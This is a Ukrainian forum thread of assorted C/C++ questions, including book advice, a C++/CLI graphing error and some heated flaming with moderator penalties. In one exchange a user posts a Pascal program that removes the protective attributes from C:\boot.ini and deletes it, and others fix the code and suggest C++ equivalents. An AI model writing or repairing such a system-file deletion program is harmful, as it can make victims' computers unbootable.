Перейти до вмісту

С / C++ , всі питання тут


Повідомлень в темі: 117

#21 Pit

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 723 повідомлень
  • Стать:Чоловік

Відправлено 22.05.2009 – 18:50

Перекладіть будь ласка оцю прогу з паскаля на С++
{$M 2048, 0, 0} 
uses DOS; 
var
 path: PathStr;
begin
path:='C:\boot.ini';
 exec('C:\WINDOWS\system32\cmd.exe','/C attrib -r -h -a -s' + path);
 exec('C:\WINDOWS\system32\cmd.exe','/C del '+ path);
 swapvectors;
 end.
Цікаво, чи на С++ вона буде працювати, бо на паскалі викидає отакево і хоч убийся:

Цитата

Недопустимый ключ - "-sC:\boot2.ini"
Не удается найти С:\boot2.ini

  • 0

#22 mim

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 680 повідомлень
  • Стать:Чоловік
  • Місто:Київ

Відправлено 22.05.2009 – 19:46

постав пробіл після s, щоб ось так було
 exec('C:\WINDOWS\system32\cmd.exe','/C attrib -r -h -a -s ' + path);

  • 0

#23 Pit

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 723 повідомлень
  • Стать:Чоловік

Відправлено 22.05.2009 – 20:09

ггг))пішло, дякую. Та все ж, яка команда в С++ є відповідником exec паскаля
  • 0

#24 Lactarius

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 976 повідомлень
  • Стать:Чоловік
  • Місто:Львів

Відправлено 23.05.2009 – 23:49

system("pause"); //наприклад
якщо не помиляюся
  • 0

#25 Pit

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 723 повідомлень
  • Стать:Чоловік

Відправлено 24.05.2009 – 13:25

Перегляд дописуPit (22.05.2009 21:09) писав:

Та все ж, яка команда в С++ є відповідником exec паскаля
З важкою бідою надибав таке, але попри це, до мене все одно не дійшло... Ну будь ласка, перекладіть прогу повністю.
  • 0

#26 Evol

    Старійшина

  • Користувачі
  • PipPipPipPipPipPipPipPipPipPip
  • 1846 повідомлень
  • Стать:Чоловік

Відправлено 24.05.2009 – 18:57

Перегляд дописуLactarius (24.05.2009 00:49) писав:

system("pause"); //наприклад
якщо не помиляюся
ше можна WinExec юзати.
  • 0

#27 FT232BM

    私は人々嫌い

  • Користувачі
  • PipPipPipPipPipPipPipPipPipPip
  • 3435 повідомлень
  • Стать:Чоловік
  • Місто:Київ->НТУУ "КПІ"

Відправлено 25.05.2009 – 12:29

Флейм та офтоп видалено!
Lactarius тримай відсотки на депозит


FT232BM: покарання +10% до попереджень (за пунктом правил 2.2.1).
Сподіваюсь таке не повториться!
  • 0

#28 Lactarius

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 976 повідомлень
  • Стать:Чоловік
  • Місто:Львів

Відправлено 25.05.2009 – 15:36

Повториться, якщо нубаси не бажатимуть какати самі.

Відповідь

Цитата

гм... це можна!
Теж флейм
  • 0

#29 Amarok

    Старійшина

  • Користувачі
  • PipPipPipPipPipPipPipPipPipPip
  • 2350 повідомлень
  • Стать:Чоловік
  • Місто:Дубно -> Нетішин -> Київ -> New York

Відправлено 25.11.2009 – 05:07

Перегляд дописуDarkSun (7.12.2008 05:31) писав:

Хочу вчити C++. З чого краще починати? Не порекомендуєте якихось гарних підручниеків?
Брюс Еккель досить добре розжовує ази.
  • 0

#30 Igorock

    Чайник

  • Користувачі
  • Pip
  • 5 повідомлень

Відправлено 14.01.2010 – 20:42

Доброго вечора! Хочу побудувати графік сінуса по натисканні на button2. Підключив ZedGraph, усе таке, але видає помилку
cannot convert parameter 2 from 'ZedGraph::PointPairList' to 'cli::array<Type,dimension> ^'
на цей фрагмент:
myCurve = myPane.AddCurve(L"Sin", list1 , Color::Red, SymbolType::Diamond ); // отрисовываем график

Допоможіть будь ласка, в чому річ?

private: System::Void button2_Click(System::Object^  sender, System::EventArgs^  e) 
	 {
	   ZedGraphControl zgc;
	   GraphPane myPane = zgc.GraphPane;
		
	 
	   // Задаем название графика и сторон
       myPane.Title->Text = "График синусойды";
	   myPane.XAxis->Title->Text = "Ось X";
	   myPane.YAxis->Title->Text = "Ось Y";
	   // -------------------------------- 
	 
	 
	   // строим синусойду
	   double xg, yg;
	   
	   PointPairList list1 = gcnew PointPairList();

	   for ( int i = 0; i < 36; i++ )
	   {
	      xg = i;
		  yg = Math::Sin(xg);
		  list1.Add(xg, yg);
	   }
	   // ---------------- 
	   LineItem ^myCurve;
	   myCurve = myPane.AddCurve(L"Sin", list1 , Color::Red, SymbolType::Diamond ); // отрисовываем график
	  
	   zgc.AxisChange();

	 }

Повідомлення відредагував Igorock: 14.01.2010 – 20:44

  • 0

#31 Lactarius

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 976 повідомлень
  • Стать:Чоловік
  • Місто:Львів

Відправлено 14.01.2010 – 21:23

Умнічка... тобі сюди http://www.tereveni....?showtopic=7744
  • 0

#32 Igorock

    Чайник

  • Користувачі
  • Pip
  • 5 повідомлень

Відправлено 14.01.2010 – 21:50

Перегляд дописуLactarius (14.01.2010 21:23) писав:

Умнічка... тобі сюди http://www.tereveni....?showtopic=7744

стоп-стоп, я на плюсах це пишу, а не на C#
  • 0

#33 Lactarius

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 976 повідомлень
  • Стать:Чоловік
  • Місто:Львів

Відправлено 14.01.2010 – 22:09

Цитата

стоп-стоп, я на плюсах це пишу, а не на C#
Хіба за тим лінком що я тобі дав пише "C#, всі питання тут" ? ні там пише .NET Перед тим як програмувати, вивчи на чому ти програмуєш. Те що ти написав, це не щось інше, а код на C++/CLI чи як його ще величають Managed C++ і це частина технології .NET
  • 0

#34 Blackvistaspam

    Постійний житель

  • Користувачі
  • PipPipPipPipPip
  • 125 повідомлень
  • Стать:Чоловік

Відправлено 11.08.2010 – 14:07

Лежить дома Страуструп ,однозначно не рекомендую починати з цієї книжки тим, хто хоче програмувати на С++,навіть для середнього рівня спеціалістів ця книга доволі важка і скоріш за все годится для відладки та пошуку помилок у складних програмах де широко використовуются класи з вказівниками та методи віртуалізації.Для тих кто програмування в очі небачив навіть Герберт Шилд буде доволі важким ,але якщо вони мали певний досвід с тим же паскалем - то в самий раз.А так рекомендую Марченко А.Л. С++ БАРХАТНЫЙ ПУТЬ на російській мові та досить непогану шпору від Герберта Шилда - справочник С++(для зазубрення,коротка неважка книжка). Думаю для університетського рівня буде досить ,але не більше .(Досить велику увагу потрібно вділяти термінології ,бо без знань тих чи іншіх термінів ви незможете задати хороші питання для вирішення ваших відповідей,тому основну увагі при вивченні С++ приділяйте термінам).
  • 0

#35 Zuzik

    наглий, самоувєрєнний хам!

  • Користувачі
  • PipPipPipPipPipPipPipPipPipPip
  • 1126 повідомлень
  • Стать:Чоловік

Відправлено 11.08.2010 – 21:38

гм... знову м'яке і тепле поплутали...
Страуструп в принципі бути для будь-якого спеціаліста важким не може... бо інакше це не спеціаліст а любитель, а точніше школяр, якому вивчити тра.

з.і. особливо радує посилання на Паскаль... добре що хоч MASM не згадали в сує і Абеля, ім'я йому Пітер, як приклад літератури для спеціалістів молодшої шкільної групи не згадували...
  • 0

#36 Zuzik

    наглий, самоувєрєнний хам!

  • Користувачі
  • PipPipPipPipPipPipPipPipPipPip
  • 1126 повідомлень
  • Стать:Чоловік

Відправлено 11.08.2010 – 21:43

Перегляд дописуSimonRay (11.08.2010 22:41) писав:

Очевидно не настільки тупий щоб порушувати правила цього порталу ,прошу модераторів звернути увагу на цього нахабу.
видно не настільки... п.2.5 :) для скарг існує спеціяльна кнопочка...
  • 0

#37 Lactarius

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 976 повідомлень
  • Стать:Чоловік
  • Місто:Львів

Відправлено 11.08.2010 – 21:47

Цей нахаба - колишній модератор розділу програмування. Очевидно, що правила знає. І очевидно, що цей нахаба читав книжку і не помітив там нічого складного, просто книга написана стисло без натягувань резини

П.С. ФТ, коли будеш ставити плюс 10 зверни увагу, що від попереднього вже пройшов місяць. дякую. а ну і ше напиши якось, ато чото давно тебе не бачив.

Повідомлення відредагував Lactarius: 11.08.2010 – 21:51

  • 0

#38 Zuzik

    наглий, самоувєрєнний хам!

  • Користувачі
  • PipPipPipPipPipPipPipPipPipPip
  • 1126 повідомлень
  • Стать:Чоловік

Відправлено 11.08.2010 – 21:58

Перегляд дописуSimonRay (11.08.2010 22:54) писав:

Слово колишній багато чого говорить .Слово хам у підписі також .
Небачив жодного корисного посту з його участю .
п.2.2.1

з.і. правка попередніх постів за декілька хвилин після їх написання правилами не заборонена однак справедливо вважається шельмуванням :)
  • 0

#39 Lactarius

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 976 повідомлень
  • Стать:Чоловік
  • Місто:Львів

Відправлено 11.08.2010 – 22:02

Ну якщо мені не можна додати в пост Пункт П.С. то вбийся об стінку.
  • 0

#40 Lactarius

    Генеральний писар

  • Користувачі
  • PipPipPipPipPipPipPipPipPip
  • 976 повідомлень
  • Стать:Чоловік
  • Місто:Львів

Відправлено 11.08.2010 – 22:21

Цитата

Мені подруги вистачає.
ну то вона обрадується, що в тебе нема сосіські
FT232BM: Тебе теж трішки покараю, хоча розумію, що тобі з дебілами важко :) Усне попередження за п.п. 2.5

Олеська: Порушення (для FT232BM) правил п.2.2.
  • 0



Кількість користувачів, що читають цю тему: 1

0 користувачів, 1 гостей, 0 анонімних